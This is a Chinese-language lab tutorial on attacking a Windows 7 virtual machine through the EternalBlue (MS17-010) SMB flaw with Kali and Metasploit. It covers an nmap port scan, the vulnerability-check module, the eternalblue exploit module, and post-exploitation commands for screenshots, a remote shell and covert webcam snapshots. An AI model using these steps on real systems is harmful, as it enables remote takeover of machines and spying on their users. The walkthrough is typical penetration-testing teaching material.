一、搭建测试环境

两台虚拟机

  • kali linux(攻击机)ip:192.168.11.132
  • Windows 7(被攻击机)ip:192.168.11.128

tips:被攻击机防火墙需要关闭否则会对实验造成影响

二、扫描端口

使用nmap扫描端口查看是否开放445端口

nmap 192.168.11.128

发现445端口开放

三、使用Metasploit工具

msf(Metasploit)是一个开源的工具,它常常应用于渗透测试方面,它里面六个模块分别为辅助模块(auxiliary)渗透攻击模块(exploits)后渗透攻击模块(post)攻击载荷模(payloads)空指令模块(nops)编码器模块(encoders)。它里面含有2000多种漏洞库存,用于测试

使用msfconsole进入该工具,然后使用search ms17-010寻找所需模块

1、检验是否有漏洞

使用auxiliary模块验证是否有永恒之蓝漏洞:use auxiliary/scanner/smb/smb_ms17_010

show options可以查看需要配置的东西

  1. 配置ip:set RHOSTS 192.168.11.128
  2. 配置端口:set RPORT 445

配置好之后run即可

可以看到它检测出来这个ip有永恒之蓝漏洞

2、攻击

使用exploit模块进行攻击:use exploit/windows/smb/ms17_010_eternalblue

show options查看需要配置的内容

同理,配置好ip和端口即可

然后run即可,出现下面这种就代表成功

3、利用

  1. 使用screenshot可以截屏
  2. 使用shell可以进入被攻击机的Windows shell
  3. 使用webcam_snap可以使用摄像头拍照
  4. exit退出

但在使用Windows shell的时候会发现有乱码

使用chcp 65001,改变代码页(65001为UTF-8的代码页),这样就显示正常了

既然都能使用Windows shell了,那就什么事都不在话下了